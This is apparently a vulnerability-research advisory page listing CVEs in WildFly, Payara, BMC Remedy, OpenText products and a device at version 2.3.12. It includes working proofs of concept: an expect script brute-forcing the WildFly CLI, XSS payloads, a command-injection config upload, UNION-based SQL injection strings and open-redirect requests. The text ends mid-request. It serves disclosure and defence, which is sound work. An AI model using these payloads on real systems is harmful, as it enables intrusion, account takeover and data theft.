Vulnerability Research & Advisor

Vulnerability Description: Weak Password Requirements - CWE-521

Software Version: 2.0

NIST: https://nvd.nist.gov/vuln/detail/CVE-2025-24949

CVSS:

Severity:

Credits: Alberto Arganese, Cristian Castrechini, Federico Draghelli, Massimiliano Brolli

It is possible to bypass security requirements during the password change process.

Security Impact

Bypassing the password complexity criteria, it is possible to use weak passwords and compromise the security of the user account.

Vulnerability Description: Use of GET Request Method With Sensitive Query Strings - CWE-598

Software Version: 2.0

NIST: https://nvd.nist.gov/vuln/detail/CVE-2025-24948

CVSS:

Severity:

Credits: Alberto Arganese, Cristian Castrechini, Federico Draghelli, Massimiliano Brolli

Passwords are sent via HTTP GET-type requests, potentially exposing credentials to eavesdropping or insecure records.

Security Impact

Because the GET request string is included in the URL, passwords can be stored in server logs, browser cache, or browsing history, increasing vulnerability to eavesdropping or unauthorized access.

Vulnerability Description: Improper Restriction of Excessive Authentication Attempts - CWE-307

Software Version: 34.0.0.Beta

NIST: https://nvd.nist.gov/vuln/detail/CVE-2025-23368

CVSS:

Severity:

Credits: Claudia Bartolini, Marco Ventura, Massimiliano Brolli

The product does not implement sufficient measures to prevent multiple failed authentication attempts within a short time frame, making it more susceptible to brute force attacks via CLI.

Step-by-step instructions and PoC

This vulnerability can allow the actor to perform actions more frequently than expected. The actor could be a human or an automated process such as a virus or bot. An authentication routine might not limit the number of times an attacker can guess a password.

Affected Endpoints

·       CLI: /home/kali/Downloads/wildfly-34.0.0.Beta1/bin/jboss-cli.sh --connect

·       CLI command: connect [USER]@[IP-TARGET]:[PORT]

Below the evidence with the vulnerability details and the payloads used.

Payload used to exploit the vulnerability:

#!/usr/bin/expect

set timeout 10

set password  "fakepwd"

set limit 51

spawn /home/kali/Downloads/wildfly-34.0.0.Beta1/bin/jboss-cli.sh --connect

for {set i 1} {$i <= $limit} {incr i} {

send "echo \"Guessing password attempt nr: \" $i\r"

expect {

              "\[standalone@localhost:9990 /\] " {

              send "/core-service=management:whoami(verbose=true)\r"

              }

        }

       expect {

              "\[standalone@localhost:9990 /\] " {

              send "/core-service=server-environment:read-attribute(name=qualified-host-name)\r"

              }

        }           

send "connect admin@ip:port\r"

expect "Password:"

if { $i == $limit } {

       set password "admin"

}

send "$password\r"

expect {

              "\[standalone@admin@ip:port /\] " {

              send "/core-service=management:whoami(verbose=true)\r"

              }

        }

       expect {

              "\[standalone@admin@ip:port /\] " {

              send "/core-service=server-environment:read-attribute(name=qualified-host-name)\r"

              }

        }      

}

expect eof

The vulnerability can be targeted using the connect command by CLI and changing the “Password” value a number of times, for example 51 attempts:

Security Impact

Once the attacker successfully guesses the credentials, they can gain unauthorized access to sensitive data, be able to cause a denial of service or increase vulnerability to other attacks.

Vulnerability Description: Improper Access Control – CWE-284

Software Version: 34.0.0.Beta

NIST: https://nvd.nist.gov/vuln/detail/CVE-2025-23367

CVSS:

Severity:

Credits: Claudia Bartolini, Marco Ventura, Massimiliano Brolli

The product WildFly 34.0.0.Beta does not restrict or incorrectly restricts access to a resource from an unauthorized actor. When authorization to control management operations is secured using the Role Based Access Control provider, a user without the required privileges can suspend or resume the server. A user with a Monitor or Auditor role is supposed to have only read access permissions and should not be able to suspend the server. The vulnerability is caused by the Suspend and Resume handlers not performing authorization checks to validate whether the current user has the required permissions to proceed with the action.

Step-by-step instructions and PoC

A remote user, authenticated to the Management Console, can suspend and restore server  in the Standalone Server Runtime page. Successfully exploitation of this vulnerability can lead to a wide range of problems, including information exposures, denial of service, and arbitrary code execution.

Affected Endpoints

·       URL: http://[IP]:[PORT]/console/index.html#runtime;path=standalone-server-column~standalone-host-[HOSTNAME]

·       Vulnerable Configuration Parameter: Suspend State

Below the evidence with the vulnerability details and the payloads used.

Payload used to exploit the vulnerability:

bwAAAAMAD3N1c3BlbmQtdGltZW91dEkAAAAeAAlvcGVyYXRpb25zAAdzdXNwZW5kAAdhZGRyZXNzbAAAAAA=

As a first step, the attacker, in this case an ordinary “auditor” user, must be logged in the Management Console and has to enter the Runtime session. As you can see in the following image, the “Suspended State” is RUNNING:

Then, the attacker has to send a HTTP request, as shown below:

Finally, the “Suspended State” is SUSPENDED by “auditor” user:

The proof is in the WildFly server log as well:

This action is allowed also to the users belonging to the other groups:

deployer, maintainer, auditor, monitor and operator.

Security Impact

If an attacker gain access to functionality that they are not permitted to access then can execute operations meant for administrators.

Amongst other things, the consequences are:

·       Operational instability

·       Unauthorized control over the application

·       Triggering system-level commands or processes.

·       Suspend/resume the servers

Vulnerability Description: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') – CWE-79

Software Version: 34.0.0.Beta

NIST: https://nvd.nist.gov/vuln/detail/CVE-2025-23366

CVSS:

Severity:

Credits: Claudia Bartolini, Marco Ventura, Massimiliano Brolli

The product WildFly 34.0.0.Beta does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Two types of XSS attack have been found. In the first, the attacker must be authenticated as a user that belongs to management groups “SuperUser”, “Admin”, or “Maintainer”. In the other, the actor must be authenticated as user that belongs to whichever management group.

1.      Step-by-step instructions and PoC

A remote user, authenticated to the HAL Console, can store malicious JavaScript code within the “Name” attribute, in the Standalone Server Configuration page. Successfully exploitation of this vulnerability can cause the extraction of some information and/or the execution of arbitrary HTTP Request in the context of victim's session.

Affected Endpoints

·       URL: http://[IP]:[PORT]/console/index.html#standalone-server

·       Vulnerable Configuration Parameter: Name

Below the evidence with the vulnerability details and the payloads used.

Payload used to exploit the vulnerability:

><img src=x onerror=alert('XSS')>

As a first step, the attacker must be logged in the HAL Console and has to enter the Runtime session and click on “View” button relating the server, as shown below:

And in the next page, the attacker just needs to click the “Edit” link label and replace the “Name” attribute and save it:

After the server has been reloaded, the server name changed and, when the attacker select “Configuration Changes” as shown below, the script runs

Security Impact

If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. The attacker places their exploit into the application itself and simply waits for users to encounter it.

Amongst other things, the attacker can:

•           Perform any action within the application that the user can perform.

•           View any information that the user is able to view.

•           Modify any information that the user is able to modify.

•           Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.

2.      Step-by-step instructions and PoC

A remote user, authenticated to the Management Console, can store malicious JavaScript code within the “URL” attribute, in the Standalone Server Runtime page. Successfully exploitation of this vulnerability can cause the extraction of some information and/or the execution of arbitrary HTTP Request in the context of victim's session.

Affected Endpoints

·       URL: http://[IP]:[PORT]/console/index.html#runtime;path=standalone-server-column~standalone-host-[HOST_NAME]

·       Vulnerable Configuration Parameter: URL

Below the evidence with the vulnerability details and the payloads used.

Payload used to exploit the vulnerability:

javascript:alert('XSS Runtime URL')

As a first step, the attacker, in this case an ordinary “auditor” user, must be logged in the HAL Console and has to enter the Runtime session and click on the dropdown menu’s trigger relating the server and select “Edit URL”, as shown below:

And modify the URL field with the javascript malicious code:

Finally, the javascript is available, up and running

Critically important, the previous javascript is also used by the web applications deployed in the web server, through the context root, especially for the admin users that are affected by javascript set by a non-admin user.

Below is represented the admin deployments frame in which is present the context root “webshell” that carry out the cross site scripting described previously:

Vulnerability Description: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - CWE-79

Software Version: 6.2024.11

NIST: https://nvd.nist.gov/vuln/detail/CVE-2025-1534

CVSS:

Severity:

Credits: Claudia Bartolini, Marco Ventura, Massimiliano Brolli

In Payara Server Community version 6.2024.11 is possible to perform Stored Cross-site scripting attacks. Stored cross-site scripting vulnerabilities arise when user input is stored and later embedded into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

Security Impact

An attacker can exploit this vulnerability to extract some information or run arbitrary HTTP Request in the context of victim's session.

Vulnerability Description: Improper Authentication - CWE-287

Software Version: 7.6.04

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-34399

CVSS:

Severity:

Credits: Gabriele Duchi, Marco Ventura, Giulio Pellegrini, Massimiliano Brolli

** UNSUPPORTED WHEN ASSIGNED ** 
An issue was discovered in BMC Remedy Mid Tier 7.6.04. An unauthenticated remote attacker is able to access any user account without using any password.
NOTE: This vulnerability only affects products that are no longer supported by the maintainer and the impacted version for this vulnerability is 7.6.04 only.

Security Impact

By exploiting this vulnerability, an unauthenticated remote attacker can access any user account without using any password.

Vulnerability Description: HTML Injection - Stored - CWE-80

Software Version: 7.6.04

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-34398  

CVSS:

Severity:

Credits: Gabriele Duchi, Marco Ventura, Giulio Pellegrini, Massimiliano Brolli

The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special characters such as "<", ">", and "&" that could be interpreted as web-scripting elements when they are sent to a downstream component that processes web pages.

This may allow such characters to be treated as control characters, which are executed client-side in the context of the user's session.

Security Impact

An authenticated attacker can store arbitrary HTML code in order to corrupt the web page, for example by creating phishing sections to extrapolate the victims' credentials.

Vulnerability Description: Improper Neutralization of Input During Web Page Generation ('Reflected Cross-site Scripting') - CWE-79

Software Version: 12.1.0-20211215

NIST: https://nvd.nist.gov/vuln/detail/ CVE-2024-28803

CVSS:

Severity:

Credits:  Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli

Reflected cross site scripting (XSS) vulnerability allows authenticated remote attackers to inject arbitrary web script or HTML into HTTP/POST parameter which reflects/store the user input without sanitization.

Step-by-step instructions and PoC

The Web application does not properly check the parameters sent as input from clients before they are re-included within the HTTP pages returned by the application. In particular, the web gui is affected by the reflected type of this vulnerability. Due to the lack of validation of user input, it allows an attacker to modify the HTML code and the expected execution flow could be altered. The attack can be performed post authentication.

Affected Endpoints

1.     URL: https://[HOST]/[NODE-NAME]/IMCSCI-WebGui/actloglineview.jsp

o   HTTP POST Parameter: name, actLine

2.     URL: https://[HOST]/[NODE-NAME]/CI-NorthBound-common/rest/fault/activeAlarms

o   HTTP POST Json Parameter: numQueryResults 

Below is the evidence with the vulnerability details and the payloads used to exploit it on the URL #1

Below is the evidence with the vulnerability details and the payloads used to exploit it on the URL #2

Security Impact

Successful attacks of this vulnerability can result in unauthorized access to critical data or complete account takeover.

Vulnerability Description: Improper Handling of Parameters - CWE-233

Software Version: 7.0.15

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-9329

CVSS: 6.1

Severity: Medium

Credits: Marco Ventura, Claudia Bartolini, Andrea Carlo Maria Dattola, Debora Esposito, Massimiliano Brolli

The Host HTTP parameter could cause the web application to redirect to the specified URL, when the requested endpoint is '/management/domain'. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.

Step-by-step instructions and PoC

The application presents an Open Redirect on the Host parameter, when the /management/domain endpoint is requested via an HTTP GET request.

Affected Endpoints

URL: https://[IP]:[PORT]/management/domain

HTTP Parameter: Host

Below is the evidence with the vulnerability details and the payload used.

To perform this attack, the attacker does not need to be authenticated to the target application.

Security Impact

An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain and with a valid SSL certificate (if SSL is used), lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Vulnerability Description: RCE on file configuration parameter - CWE-78

Software Version: 2.3.12

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-9054

CVSS: 8.8

Severity: High

Credits: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli

The device doesn't correctly sanitize parameters content of the configuration file. An attacker able to upload a new configuration file could insert in the parameter 'secret_key' malicious bash commands that will be executed by the device.

Step-by-step instructions and PoC

A malicious user has got a configuration file or can download it from the device web GUI . This user could locally modify the content of this file because it is in cleartext. Specifically, a bash command could be inserted in a parameter (“shared_key”) present in the xml structure of the file. Once this file is loaded, after authentication, through the web GUI, the device executes the command inserted.

Affected Endpoints

URL: http://<device_IP>/config_restore

XML Parameter: secret_key

Below the evidence with the vulnerability details and the payloads used.

Payload used to exploit the vulnerability:

POST /config_restore HTTP/1.1

Host: <device_IP>

Cookie: ci_session=1b4e84dfb3a749723b333697870193996399758b

Content-Length: 206564

Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"

Sec-Ch-Ua-Platform: "Linux"

Sec-Ch-Ua-Mobile: ?0

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36

Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7riABGiPPkPZ3FY6

Accept: */*

Origin: https://<device_IP>

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: cors

Sec-Fetch-Dest: empty

Referer: https://<device_IP>/configbackuprestore

Accept-Encoding: gzip, deflate, br

Accept-Language: en-US,en;q=0.9

Priority: u=1, i

Connection: close

------WebKitFormBoundary7riABGiPPkPZ3FY6

Content-Disposition: form-data; name="file"; filename="tp4100_cfg1.txt"

Content-Type: text/plain

<?xml version="1.0"?>

……………………………………………………….

<server>

<ip><device_IP></ip>

<secret_key>`ping <LAN_client_IP> 49`</secret_key>

<timeout>3</timeout>

<auth_proto>PAP</auth_proto>

<port>49</port>

</server>

…………………………………………………………

This first step consists of obtaining (download it from the web GUI or having one) the configuration file. Then the content of the vulnerable parameter (i.e. “shared_key”) is modified with the bash command chosen:

`ping [LAN_client_IP] 49`

Then the file is uploaded by using the web GUI and it is accepted by the device, see the picture below.

Finally, in the following image is shown as the bash command is executed by the device because ICMP packets arrive to the [LAN_client_IP] chosen in the command itself:

Security Impact

A malicious user with the access to the web GUI of the device could insert a bash command to construct a reverse shell to the device and to control it. Another situation could be represented by a malicious user that reaches the device network and knows the structure of the configuration file, that, through social engineering techniques, forces a user with access to the web GUI to load the infected file and to reach the same objective reported above.  

Vulnerability Description: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') - CWE-89

Software Version: 2.3.12

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-7801

CVSS: 6.5

Severity: Medium

Credits: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli

It is possible to perform an unauthenticated SQL injection request on the web resource 'get_chart_data' in the parameter 'channelId'. The device concatenates user input in the SQL query (SQLite) and execute it.

Step-by-step instructions and PoC

Affected Endpoints

·       URL: https://<device_IP>/get_chart_data

·       HTTP Parameter: channelId

Below the evidence with the vulnerability details and the payloads used.

Payload used to exploit the vulnerability:

POST //get_chart_data HTTP/1.1

Host: <device_IP>

Content-Length: 932

Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"

Accept: application/json, text/javascript, */*; q=0.01

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Sec-Ch-Ua-Mobile: ?0

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36

Sec-Ch-Ua-Platform: "Linux"

Origin: https://<device_IP>

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: cors

Sec-Fetch-Dest: empty

Referer: https://<device_IP>/perfmon_tenmhz_stat

Accept-Encoding: gzip, deflate, br

Accept-Language: en-US,en;q=0.9

Priority: u=1, i

Connection: close

metric=mtie_a&xRange=1&tStart=-1&channelName=tenMHz&channelId=1_status%20UNION%20SELECT%20sqlite_version(),%202,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015,%2016,%2017,%2018,%2019,%2020,%2021,%2022,%2023,%2024,%2025,%2026,%2027,%2028,%2029,%2030,%2031,%2032,%2033,%2034,%2035,%2036,%2037,%2038,%2039,%2040,%2041,%2042,%2043,%2044,%2045,%2046,%2047,%2048,%2049,%2050,%2051,%2052,%2053,%2054,%2055,%2056,%2057,%2058,%2059,%2060,%2061,%2062,%2063,%2064,%2065,%2066,%2067,%2068%20UNION%20SELECT%201,%202,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015,%2016,%2017,%2018,%2019,%2020,%2021,%2022,%2023,%2024,%2025,%2026,%2027,%2028,%2029,%2030,%2031,%2032,%2033,%2034,%2035,%2036,%2037,%2038,%2039,%2040,%2041,%2042,%2043,%2044,%2045,%2046,%2047,%2048,%2049,%2050,%2051,%2052,%2053,%2054,%2055,%2056,%2057,%2058,%2059,%2060,%2061,%2062,%2063,%2064,%2065,%2066,%2067,%2068%20FROM%20tenMHz1

A user, connected to the LAN of the device, can perform an unauthenticated request to the web resource ‘get_chart_data’. 

Below is the evidence with the vulnerability details and the payload used.

The field ‘channelId’ in the body of the POST request is vulnerable to a SQL injection attack. The injected SQL code in this field isn’t sanitized and executed on the device. Then it is possible for an attacker to retrieve information such as SQL version of the DB and tables content. In the image below the payload used for reading the SQL version is the following:

1_status%20UNION%20SELECT%20sqlite_version(),%202,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015,%2016,%2017,%2018,%2019,%2020,%2021,%2022,%2023,%2024,%2025,%2026,%2027,%2028,%2029,%2030,%2031,%2032,%2033,%2034,%2035,%2036,%2037,%2038,%2039,%2040,%2041,%2042,%2043,%2044,%2045,%2046,%2047,%2048,%2049,%2050,%2051,%2052,%2053,%2054,%2055,%2056,%2057,%2058,%2059,%2060,%2061,%2062,%2063,%2064,%2065,%2066,%2067,%20

68%20UNION%20SELECT%201,%202,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015,%2016,%2017,%2018,%2019,%2020,%2021,%2022,%2023,%2024,%2025,%2026,%2027,%2028,%2029,%2030,%2031,%2032,%2033,%2034,%2035,%2036,%2037,%2038,%2039,%2040,%2041,%2042,%2043,%2044,%2045,%2046,%2047,%2048,%2049,%2050,%2051,%2052,%2053,%2054,%2055,%2056,%2057,%2058,%2059,%2060,%2061,%2062,%2063,%2064,%2065,%2066,%2067,%2068%20FROM%20tenMHz1

In the following image the payload used to extract the structure of the DB is:

1_status%20UNION%20SELECT%20sql,%202,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015,%2016,%2017,%2018,%2019,%2020,%2021,%2022,%2023,%2024,%2025,%2026,%2027,%2028,%2029,%2030,%2031,%2032,%2033,%2034,%2035,%2036,%2037,%2038,%2039,%2040,%2041,%2042,%2043,%2044,%2045,%2046,%2047,%2048,%2049,%2050,%2051,%2052,%2053,%2054,%2055,%2056,%2057,%2058,%2059,%2060,%2061,%2062,%2063,%2064,%2065,%2066,%2067,%2068%20FROM%20sqlite_master%20WHERE%20type=’table’%20LIMIT%201%20OFFSET%200--%20UNION%20SELECT%201,%202,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015,%2016,%2017,%2018,%2019,%2020,%2021,%2022,%2023,%2024,%2025,%2026,%2027,%2028,%2029,%2030,%2031,%2032,%2033,%2034,%2035,%2036,%2037,%2038,%2039,%2040,%2041,%2042,%2043,%2044,%2045,%2046,%2047,%2048,%2049,%2050,%2051,%2052,%2053,%2054,%2055,%2056,%2057,%2058,%2059,%2060,%2061,%2062,%2063,%2064,%2065,%2066,%2067,%2068%20FROM%20tenMHz1

Security Impact

A malicious user connected to the LAN of the device without privileges could access sensitive information in the Database of the device itself.

Vulnerability Description: Incorrect Permission Assignment for Critical Resource – CWE-732

Software Version: 10.1.0

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-6360

CVSS:

Severity:

Credits: Davide Brian Di Campi, Massimiliano Brolli

The product creates, stores, and uses hard-coded plaintext keys that are needed for authorization when calling protected APIs

Security Impact

Incorrect Permission Assignment for Critical Resource vulnerability in OpenText™ Vertica could allow Privilege Abuse and result in unauthorized access or privileges to Vertica agent apikey. This issue affects Vertica: from 10.0 through 10.X, from 11.0 through 11.X, from 12.0 through 12.X, from 23.0 through 23.X, from 24.0 through 24.X.

Vulnerability Description: Cross Site Scripting Stored - CWE-79

Software Version: 12.20, 12.21, 12.22, 12.23, 12.24, 12.25, 12.26

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-5532

CVSS:

Severity:

Credits: Marco Ventura, Claudia Bartolini, Massimiliano Brolli

In OpenText™ Operations Agent, version 12.20, 12.21, 12.22, 12.23, 12.24, 12.25 and 12.26, is possible to perform Cross-site scripting Stored attacks. This vulnerability allows an attacker to compromise the interactions that users have with the vulnerable application. Cross-site scripting vulnerabilities normally allow an attacker to masquerade as a victim user, to carry out any actions that the user is able to perform, and to access any of the user's data. If the victim user has privileged access within the application, then the attacker might be able to gain full control over all of the application's functionality and data.

Step-by-step instructions and PoC

A remote user that has the permissions to modify the agent configuration file, can perform Cross-site scripting Stored attacks. In particular, by adding a malicious payload within the CORE_ID value, the attacker can inject an arbitrary javascript code in the HTML page.

Affected Endpoints

•           URL:

–          http://[IP]:[PORT]/Hewlett-Packard/OpenView/BBC/ovrg?html

–          http://[IP]:[PORT]/Hewlett-Packard/OpenView/BBC/services?html

–          http://[IP]:[PORT]/Hewlett-Packard/OpenView/BBC/ping?html

–          http://[IP]:[PORT]/Hewlett-Packard/OpenView/BBC/status?html

•           Vulnerable configuration parameter: CORE_ID

Below the evidence with the vulnerability details and the payloads used.

Payload used to exploit the vulnerability:

This first step consist of change the CORE_ID agent configuration parameter, by adding the “img” HTML tag, as reported previously. 

Security Impact

An attacker is able to compromise the interactions that users have with the vulnerable application.

Vulnerability Description: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - CWE-79

Software Version: 2.3.12

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-43687

CVSS: 6.1

Severity: Medium

Credits: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli

The field "Custom Banner" in tab "Banner config" has been found vulnerable to stored cross-site scripting (XSS) attacks. The script injected is executed by the browser when a user visits the banner page. This type of XSS is particularly dangerous because the malicious code is saved by the device and the commands are executed for any user that loads the page, until the device is reset.

Step-by-step instructions and PoC

A user, authenticated to the web application, can insert javascript code in the banner configuration.

Affected Endpoints

•                URL: http://<device_IP>/bannerconfig

•                HTTP Parameter: txtcustom

Below the evidence with the vulnerability details and the payloads used.

Payload used to exploit the vulnerability:

POST /bannerconfig HTTP/1.1

Host: <device_IP>

Cookie: ci_session=2e5d6db87cf9104d4b8bfd4951665c2b96fffc24

Content-Length: 477

Cache-Control: max-age=0

Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"

Sec-Ch-Ua-Mobile: ?0

Sec-Ch-Ua-Platform: "Linux"

Upgrade-Insecure-Requests: 1

Origin: https://<device_IP>

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryayaMItq0sXj5hiI2

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Sec-Fetch-Dest: document

Referer: https://<device_IP>/bannerconfig

Accept-Encoding: gzip, deflate, br

Accept-Language: en-US,en;q=0.9

Priority: u=0, i

Connection: close

------WebKitFormBoundaryayaMItq0sXj5hiI2

Content-Disposition: form-data; name="user_level"

1

------WebKitFormBoundaryayaMItq0sXj5hiI2

Content-Disposition: form-data; name="bannerradio"

CUSTOMIZED

------WebKitFormBoundaryayaMItq0sXj5hiI2

Content-Disposition: form-data; name="txtcustom"

<svg onload=alert(1000000)>

------WebKitFormBoundaryayaMItq0sXj5hiI2

Content-Disposition: form-data; name="action"

applybanner

------WebKitFormBoundaryayaMItq0sXj5hiI2—

After logging, go to the panel ‘Admin’ -> ‘Banner Config’. Select ‘Custom Banner’ and insert the following javascript payload:

        <svg onload=alert(1000000)>

Then click ‘Apply’. Finally, the javascript code is executed in the banner page at ‘https://<device_IP>’

Security Impact

By using malicious javascript code the attacker may be able to perform privileged operations on behalf of the user or gain access to sensitive data belonging to the user. The attacker could: transfer private information from the victim's machine to the attacker, send malicious requests to a web site on behalf of the victim.

Vulnerability Description: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - CWE-79

Software Version: 2.3.12

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-43686

CVSS: 6.1

Severity: Medium

Credits: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli

It is possible to perform a Reflected XSS attack by inserting in the parameter 'channelId' of the POST request 'get_chart_data' a malicious javascript code.

Step-by-step instructions and PoC

An unauthenticated user can insert javascript code in field ‘channelId’ for the POST request to the web resource ‘get_chart_data’.

Affected Endpoints

•                URL: http://<device_IP>/get_chart_data

•                HTTP Parameter: channelId

Below the evidence with the vulnerability details and the payloads used.

Payload used to exploit the vulnerability:

POST //get_chart_data HTTP/1.1

Host: <device_IP>

Content-Length: 102

Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"

Accept: application/json, text/javascript, */*; q=0.01

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Sec-Ch-Ua-Mobile: ?0

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36

Sec-Ch-Ua-Platform: "Linux"

Origin: https:// <device_IP>

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: cors

Sec-Fetch-Dest: empty

Referer: https:// <device_IP>/perfmon_t1e1_stat

Accept-Encoding: gzip, deflate, br

Accept-Language: en-US,en;q=0.9

Priority: u=1, i

Connection: close

metric=mtie_a&xRange=1&tStart=-1&channelName=span&channelId=1%3cscript%3ealert(1000)%3c%2fscript%3easd

An unauthenticated user can send a POST request to the web resource ‘get_chart_data’ and insert the following URL encoded javascript payload:

1%3cscript%3ealert(1000)%3c%2fscript%3easd

Then the javascript code is executed in the page at ‘https://<device_IP>/get_chart_data’

Security Impact

By using malicious javascript code the attacker may be able to perform privileged operations on behalf of the user or gain access to sensitive data belonging to the user. The attacker could: transfer private information from the victim's machine to the attacker, send malicious requests to a web site on behalf of the victim.

Vulnerability Description: Improper Authentication – CWE-287

Software Version: 2.3.12

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-43685

CVSS: 9.8

Severity: Critical

Credits: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli

The device provides a new cookie 'ci_session' before the login. This coookie will be used in the post login session. An attacker able to obtain the cookie before the login, could use it to hijack the session.

Step-by-step instructions and PoC

The attack consists of obtaining a valid session token, inducing a user to authenticate himself with that session token, and then hijacking the user-validated session by the knowledge of the used session token.

Below are the evidences with the vulnerability details and the payloads used.

An authenticated user performs the logout operation.

The user is redirect to the login page and the new token is obtained.

Then the new session token is used for the subsequent login.

This token could be captured and used by the attacker.

Moreover, it is possible for an attacker to create a cookie with a chosen value (N.B. this value must have the same length as the original one) performing a request for an unauthenticated resource (e.g. topbardata).

Then the real user has to login by using the created token.

As showed in the next picture the token is used in the user session.

Finally, the attacker could exploit the created token to access the application without knowing the credentials (e.g. access to the dashboard).

Security Impact

The Session Fixation attack fixes an established session on the victim’s browser, so the attack starts before the user logs in. As matter of fact an attacker could access and use the web application without knowing the credentials.

Vulnerability Description: Cross-Site Request Forgery (CSRF)– CWE-352

Software Version: 2.3.12

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-43684

CVSS: 8.8

Severity: High

Credits: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli

The device does not implement an Anti-CSRF token to protect the device against potential cross site request forgery attack.

Step-by-step instructions and PoC

Below are the evidences with the vulnerability details and the payloads used.

The device doesn’t implement protection against Cross-Site Request Forgery (CSRF). The user could be tricked by an attacker into making an unintentional request to the web server which will be treated as an authentic request. Here the PoC used to trick the user: the message showed in the banner will be changed into ‘CSRFATTACK’.

After the user submit the request using the PoC, the banner is actually changed.

Security Impact

An attacker could effectively perform any operations as the victim. These may include: obtaining complete control over the web application, deleting or stealing data. Because the attacker has the identity of the victim, the scope of CSRF is limited only by the victim's privileges.

Vulnerability Description: URL Redirection to Untrusted Site ('Open Redirect') – CWE-601

Software Version: 2.3.12

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-43683

CVSS: 6.1

Severity: Medium

Credits: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli

The device does not properly verify the "Host" header field contained in GET/POST requests. In the attached evidences, the legit 'Host' field is replaced with the public name of another host (in this case pentester.com) and the requests are accepted by the device that redirect to malicious page.

Step-by-step instructions and PoC

Without validation of header Host is possible to redirect a user to malicious website owned by the attacker.

Below the evidence with the vulnerability details and the payloads used.

Payload used to exploit the vulnerability:

GET /dashboard HTTP/1.1

Host: pentester.com

Cache-Control: max-age=0

Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"

Sec-Ch-Ua-Mobile: ?0

Sec-Ch-Ua-Platform: "Linux"

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Sec-Fetch-Dest: document

Accept-Encoding: gzip, deflate, br

